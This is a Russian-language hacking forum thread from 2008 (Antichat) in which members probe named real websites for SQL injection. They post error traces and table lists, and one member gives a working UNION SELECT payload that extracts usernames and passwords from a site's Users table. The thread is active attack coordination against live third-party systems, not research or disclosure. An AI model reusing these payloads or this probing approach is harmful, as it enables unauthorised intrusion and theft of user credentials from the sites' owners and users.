Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

24.06.2008, 12:11
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?
Page -1 was not found
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: EPiServer.Core.PageNotFoundException: Page -1 was not found
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[PageNotFoundException: Page -1 was not found]
EPiServer.DataAccess.PageLoadDB.Load(PageReference pageLink) +698
EPiServer.DataFactory.ᐂ(PageReference ) +50
EPiServer.DataFactory.GetPage(PageReference pageLink, AccessLevel access) +496
EPiServer.PageBase.GetPage(PageReference pageLink) +171
EPiServer.SimplePage.get_CurrentPage() +177
EPiServer.EditPage.get_CurrentPage() +218
EPiServer.UserControlBase.get_CurrentPage() +21
Goteborg.templates.Units.TopMenu.InitDropDown() +15
Goteborg.templates.Units.TopMenu.OnInit(EventArgs e) +58
System.Web.UI.Control.InitRecursive(Control namingContainer) +240
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Page.ProcessRequestMain() +197
|
|
|

24.06.2008, 12:23
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме: 137918
Репутация:
56
|
|
Сообщение от Ershik
Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?
Да, вообще там используется System.Number.ParseInt32.
|
|
|

24.06.2008, 17:20
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от gisTy
надо смотреть по обстоятельствам...
Мде... чёт я не подумал).Всё равно попробую)
|
|
|

25.06.2008, 12:27
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме: 2256830
Репутация:
94
|
|
Вот у меня несколько вопросов
Нашел сайт нашел все таблицы+ колонки вопрос как прочитать колонки в таблице если я делаю запрос типу
Код:
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,3,id,username,password,7,8,9,10,11,12,13,14+FROM+Users+LIMIT+1,1/*
В таблице Users имеются следующие колонки
Код:
Users
--id,username,password,email
Возможно я чтото делаю не так или нужно шифровать? (пробовал в HEX шифровать кое где и не получилось)
в придачу даю список всех таблиц
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Blog
Cats
Comment
My_places
Portfolio
Snippet
Snippet_cat
Snippet_language
Tags
Testimonials
Top_cat
Top_rated
User
Users
|
|
|

25.06.2008, 12:40
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,concat_ws(0x3a,us ername,password),3,4,5,7,8,9,0,1,2,3,4+from+users/*
лови .. и думай ..
|
|
|

25.06.2008, 19:17
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
http://www.pemshop.com/detail.aspx?ID=1%20or%201=(select%20system_user)-- - с этим можно что нибудь сделать?
Аналогичный прошлый вопрос.
|
|
|

25.06.2008, 19:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Ershik
Только расскрытие пути
|
|
|

25.06.2008, 19:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA
скуля...какие предложения по раскрутке?
|
|
|

25.06.2008, 19:46
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'
Warning: array_count_values() [function.array-count-values]: Can only count STRING and INTEGER values! in /u0/webroot/virtual/newsite.ncbi.managed.tibus.net/ncbi/shop/show_cart.php on line 81
|
|
|

25.06.2008, 21:08
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме: 137918
Репутация:
56
|
|
Сообщение от Gorev
http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA
скуля...какие предложения по раскрутке?
Никак видимо, проверка длины параметра sstring, максимальная длина = 12 символов : хотя и пропускает = (', /**/, спец символы);
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|